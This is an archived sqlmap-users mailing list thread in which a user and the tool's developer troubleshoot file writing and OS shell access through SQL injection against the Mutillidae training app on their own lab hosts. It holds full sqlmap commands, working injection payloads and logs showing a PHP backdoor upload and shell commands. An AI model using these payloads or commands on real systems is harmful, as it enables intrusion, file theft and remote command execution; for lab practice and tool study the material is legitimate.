Re: [sqlmap-users] File Writing
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] File Writing
|
From: Chris O. <chr...@gm...> - 2011-07-07 10:37:14
|
Hi Bernardo I'm not sure what you mean when you say that the POST parameters are invalid. I tried the following: C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/muti llidae/index.php?page=user-info.php" --data "username=foo&password=bar &user-info-php-submit-button=View+Account+details" -p "username" --os-shell and the following occurs: [11:31:47] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0 [11:31:47] [INFO] going to use a web backdoor for command prompt [11:31:47] [INFO] fingerprinting the back-end DBMS operating system [11:31:48] [INFO] the back-end DBMS operating system is Windows [11:31:48] [INFO] trying to upload the file stager which web application language does the web server support? [1] ASP [2] ASPX [3] PHP (default) [4] JSP > [11:31:49] [WARNING] unable to retrieve the web server document root please provide the web server document root [C:/xampp/htdocs/,C:/Inetp ub/wwwroot/]: C:\wamp\www\mutillidae [11:32:01] [WARNING] unable to retrieve any web server path please provide any additional web server full path to try to upload th e agent [Enter for None]: C:\wamp\www\mutillidae [11:32:07] [WARNING] unable to upload the file stager on 'C:/wamp/www/ mutillidae' [11:32:08] [WARNING] unable to upload the file stager on 'C:/wamp/www/ mutillidae/mutillidae' [11:32:08] [WARNING] HTTP error codes detected during testing: 404 (Not Found) - 2 times [11:32:08] [INFO] Fetched data logged to text files under 'C:\Program Files\sqlmap-0.9\output\localhost' [*] shutting down at 11:32:08 Could it be to do with: [11:31:49] [WARNING] unable to retrieve the web server document root please provide the web server document root [C:/xampp/htdocs/,C:/Inetp ub/wwwroot/]: C:\wamp\www\mutillidae [11:32:01] [WARNING] unable to retrieve any web server path please provide any additional web server full path to try to upload th e agent [Enter for None]: C:\wamp\www\mutillidae Regards Chris On 6 July 2011 23:52, Bernardo Damele A. G. <ber...@gm...>wrote: > Hi Chris, > > No worries. > If you want command execution, sqlmap can handle it automatically also > when it's MySQL and you've got a writable folder within the document > root, --os-cmd and --os-shell. Also, --os-pwn can work in this > scenario too. > The file stager uploaded is 0KB because you provide invalid values to > the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to > upload the file stager against MySQL. > > See: > --8<-- > $ python sqlmap.py -u > "http://debian32/mutillidae/index.php?page=user-info.php" --data > "view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1 > --os-shell --flush-session > > sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover > tool > http://sqlmap.sourceforge.net > > [!] legal disclaimer: usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility > to obey all applicable local, state and federal laws. Authors assume > no liability and are not responsible for any misuse or damage caused > by this program > > [*] starting at 23:49:52 > > [23:49:52] [INFO] setting file for logging HTTP traffic > [23:49:52] [INFO] using > > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' > as session file > [23:49:52] [INFO] flushing session file > [23:49:52] [INFO] testing connection to the target url > [23:49:52] [INFO] heuristics detected web page charset 'ascii' > [23:49:52] [INFO] testing if the url is stable, wait a few seconds > [23:49:53] [INFO] url is stable > [23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic > [23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not > dynamic > [23:49:53] [INFO] heuristic test shows that POST parameter > 'view_user_name' might be injectable (possible DBMS: MySQL) > [23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name' > [23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > [23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or > HAVING clause' > [23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND > error-based - WHERE or HAVING clause' injectable > [23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries' > [23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' > [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 5.0.11 > AND time-based blind' injectable > [23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' > [23:50:04] [INFO] target url appears to be UNION injectable with 4 columns > [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION > query (NULL) - 1 to 10 columns' injectable > POST parameter 'view_user_name' is vulnerable. Do you want to keep > testing the others? [y/N] > sqlmap identified the following injection points with a total of 30 > HTTP(s) requests: > --- > Place: POST > Parameter: view_user_name > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT > COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033) > THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM > INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND > 'ekpw'='ekpw&password=adminpass&Submit_button=Submit > > Type: UNION query > Title: MySQL UNION query (NULL) - 1 to 10 columns > Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL, > > CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113) > AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND > 'TOwv'='TOwv&password=adminpass&Submit_button=Submit > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: view_user_name=admin' AND SLEEP(5) AND > 'BfoH'='BfoH&password=adminpass&Submit_button=Submit > --- > > [23:51:31] [INFO] the back-end DBMS is MySQL > > web application technology: PHP 5.2.6, Apache 2.2.9 > back-end DBMS: MySQL 5.0 > [23:51:31] [INFO] going to use a web backdoor for command prompt > [23:51:31] [INFO] fingerprinting the back-end DBMS operating system > [23:51:31] [INFO] the back-end DBMS operating system is Linux > [23:51:31] [INFO] trying to upload the file stager > which web application language does the web server support? > [1] ASP > [2] ASPX > [3] PHP (default) > [4] JSP > > > [23:51:32] [WARNING] unable to retrieve the web server document root > please provide the web server document root [/var/www/]: > [23:51:32] [WARNING] unable to retrieve any web server path > please provide any additional web server full path to try to upload > the agent [Enter for None]: /var/www/test > [23:51:35] [WARNING] unable to upload the file stager on '/var/www' > [23:51:35] [INFO] the file stager has been successfully uploaded on > '/var/www/test' - http://debian32:80/test/tmpugbmo.php > [23:51:35] [INFO] the backdoor has probably been successfully uploaded > on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php > [23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER > os-shell> id > do you want to retrieve the command standard output? [Y/n/a] > command standard output: 'uid=33(www-data) gid=33(www-data) > groups=33(www-data)' > > os-shell> pwd > do you want to retrieve the command standard output? [Y/n/a] > command standard output: '/var/www/test' > > os-shell> exit > [23:51:44] [WARNING] HTTP error codes detected during testing: > 404 (Not Found) - 1 times > [23:51:44] [INFO] Fetched data logged to text files under > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32' > > [*] shutting down at 23:51:44 > --8<-- > > Cheers, > Bernardo > > > On 6 July 2011 23:46, <chr...@gm...> wrote: > > Hi > > > > Thanks. It turns out I was being an idiot. With absolute paths I didn't > realise that this also includes the destination file name. With that > included, it works like a dream. > > > > What I haven't managed to get going properly yet is the --os-cmd flag. > The temp stager file does appear, but is empty, 0KB. However; I think I'll > save that one for another day! > > > > Regards > > > > Chris > > ------------------ > > > > -----Original Message----- > > From: "Bernardo Damele A. G." <ber...@gm...> > > Date: Wed, 6 Jul 2011 23:42:22 > > To: Chris Oakley<chr...@gm...> > > Cc: <sql...@li...> > > Subject: Re: [sqlmap-users] File Writing > > > > Hi Chris, > > > > To me it works well: > > --8<-- > > $ python sqlmap.py -u > > "http://debian32/mutillidae/index.php?page=user-info.php" --forms -p > > view_user_name --risk 3 --level 3 --parse-errors --file-write > > /etc/passwd --file-dest /tmp/test --flush-session > > > > sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover > tool > > http://sqlmap.sourceforge.net > > > > [!] legal disclaimer: usage of sqlmap for attacking targets without > > prior mutual consent is illegal. It is the end user's responsibility > > to obey all applicable local, state and federal laws. Authors assume > > no liability and are not responsible for any misuse or damage caused > > by this program > > > > [*] starting at 23:26:35 > > > > [23:26:35] [INFO] setting file for logging HTTP traffic > > [23:26:35] [INFO] testing connection to the target url > > [23:26:35] [INFO] heuristics detected web page charset 'ascii' > > [23:26:35] [INFO] searching for forms > > [#1] form: > > POST http://debian32:80/mutillidae/index.php?page=user-info.php > > POST data: view_user_name=&password=&Submit_button=Submit > > do you want to test this form? [Y/n/q] > >> > > Edit POST data [default: > > view_user_name=&password=&Submit_button=Submit] (Warning: blank fields > > detected): > > do you want to fill blank fields with random values? [Y/n] > > [23:26:37] [WARNING] the testable parameter 'view_user_name' you > > provided is not inside the GET > > [23:26:37] [INFO] using > > > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' > > as session file > > [23:26:37] [INFO] flushing session file > > [23:26:37] [INFO] using > > > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' > > as results file > > [23:26:37] [INFO] heuristics detected web page charset 'ascii' > > [23:26:37] [INFO] testing if the url is stable, wait a few seconds > > [23:26:38] [INFO] url is stable > > [23:26:38] [INFO] heuristic test shows that POST parameter > > 'view_user_name' might be injectable (possible DBMS: MySQL) > > [23:26:38] [INFO] testing sql injection on POST parameter > 'view_user_name' > > [23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > > [23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING > clause' > > [23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING > > clause (Generic comment)' > > [23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based > > blind - WHERE or HAVING clause (Generic comment)' injectable > > [23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or > > HAVING clause' > > [23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or > > HAVING clause' > > [23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING > clause' > > [23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING > clause' > > [23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' > > [23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR > > error-based - WHERE or HAVING clause' injectable > > [23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries' > > [23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' > > [23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' > > [23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy > query)' > > [23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind' > > [23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' > > [23:26:43] [INFO] target url appears to be UNION injectable with 4 > columns > > [23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION > > query (NULL) - 1 to 10 columns' injectable > > [23:26:43] [WARNING] in OR boolean-based injections, please consider > > usage of switch --drop-set-cookie if you experience any problems > > during data retrieval > > POST parameter 'view_user_name' is vulnerable. Do you want to keep > > testing the others? [y/N] > > sqlmap identified the following injection points with a total of 148 > > HTTP(s) requests: > > --- > > Place: POST > > Parameter: view_user_name > > Type: boolean-based blind > > Title: OR boolean-based blind - WHERE or HAVING clause (Generic > comment) > > Payload: view_user_name=-5244' OR NOT (1884=1884)-- > > &password=bDXj&Submit_button=Submit > > > > Type: error-based > > Title: MySQL OR error-based - WHERE or HAVING clause > > Payload: view_user_name=-3024' OR 1 GROUP BY > > CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1 > > ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)-- > > &password=bDXj&Submit_button=Submit > > > > Type: UNION query > > Title: MySQL UNION query (NULL) - 1 to 10 columns > > Payload: view_user_name=IZBb' UNION ALL SELECT NULL, > > > CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84) > > AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL, > > NULL#&password=bDXj&Submit_button=Submit > > --- > > > > do you want to exploit this SQL injection? [Y/n] > > [23:26:46] [INFO] testing MySQL > > [23:26:46] [INFO] confirming MySQL > > [23:26:46] [INFO] the back-end DBMS is MySQL > > > > web application technology: PHP 5.2.6, Apache 2.2.9 > > back-end DBMS: MySQL >= 5.0.0 > > [23:26:46] [INFO] fingerprinting the back-end DBMS operating system > > [23:26:46] [INFO] the back-end DBMS operating system is Linux > > [23:26:46] [WARNING] if the problem persists with 'None' values please > > try to use hidden switch --no-cast (fixing problems with some > > collation issues) > > do you want confirmation that the file '/tmp/test' has been > > successfully written on the back-end DBMS file system? [Y/n] > > [23:26:48] [INFO] the file has been successfully written and its size > > is 1848 bytes, but the size differs from the local file '/etc/passwd' > > (1845 bytes) > > [23:26:48] [WARNING] expect junk characters inside the file as a > > leftover from UNION query > > [23:26:48] [INFO] you can find results of scanning in multiple targets > > mode inside the CSV file > > > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' > > > > [*] shutting down at 23:26:48 > > --8<-- > > > > Cheers, > > Bernardo > > > > > > On 3 July 2011 18:03, Chris Oakley <chr...@gm...> wrote: > >> Hi > >> > >> I'm playing with file writing. I have a full privs root user set up in > >> mysql and am using > >> > http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 > >> to play with. I've set up a /temp folder below the web root of the app. > >> I've put a file "evil.php" in the sqlmap working directory. I've also > >> changed the permissions for all users on the temp folder to write access > >> allowed. > >> > >> I'm using the following input to try and upload this file: > >> > >> C:\Program Files\sqlmap-0.9>python sqlmap.py -u > >> "http://localhost/mutillidae/ind > >> ex.php?page=user-info.php" --data > >> "username=&password=&user-info-php-submit-butt > >> on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085" > >> --file-wr > >> ite "evil.php" --file-dest "temp/evil.php" > >> > >> This is with the latest dev build by the way. > >> > >> The output I get is: > >> > >> [18:00:03] [INFO] the back-end DBMS is MySQL > >> web server operating system: Windows > >> web application technology: PHP 5.3.5, Apache 2.2.17 > >> back-end DBMS: MySQL 5.0 > >> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system > >> [18:00:03] [INFO] the back-end DBMS operating system is Windows > >> [18:00:04] [WARNING] if the problem persists with 'None' values please > try > >> to us > >> e hidden switch --no-cast (fixing problems with some collation issues) > >> do you want confirmation that the file 'temp/evil.php' has been > successfully > >> wri > >> tten on the back-end DBMS file system? [Y/n] > >> [18:00:12] [WARNING] it looks like the file has not been written, this > can > >> occur > >> if the DBMS process' user has no write privileges in the destination > path > >> [18:00:12] [WARNING] expect junk characters inside the file as a > leftover > >> from U > >> NION query > >> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program > >> Files\sqlm > >> ap-0.9\output\localhost' > >> > >> [*] shutting down at 18:00:12 > >> > >> and sure enough the file isn't written. I've also tried using the > --no-cast > >> switch, to no avail. > >> > >> Does anyone have any ideas on what could be going wrong here? I can use > the > >> --file-read switch to read any file such as C:\boot.ini. The --os-cmd > and > >> --os-pwn commands also fail at the stager upload phase, probably for > similar > >> reasons. > >> > >> Any help would be appreciated > >> > >> Cheers > >> > >> Chris > >> > >> > >> > ------------------------------------------------------------------------------ > >> All of the data generated in your IT infrastructure is seriously > valuable. > >> Why? It contains a definitive record of application performance, > security > >> threats, fraudulent activity, and more. Splunk takes this data and makes > >> sense of it. IT sense. And common sense. > >> http://p.sf.net/sfu/splunk-d2d-c2 > >>_______________________________________________ > >> sqlmap-users mailing list > >> sql...@li... > >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> > >> > > > > > > > > -- > > Bernardo Damele A. G. > > > > E-mail / Jabber: bernardo.damele (at) gmail.com > > Mobile: +447788962949 (UK 07788962949) > > PGP Key ID: Unavailable > > > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > |
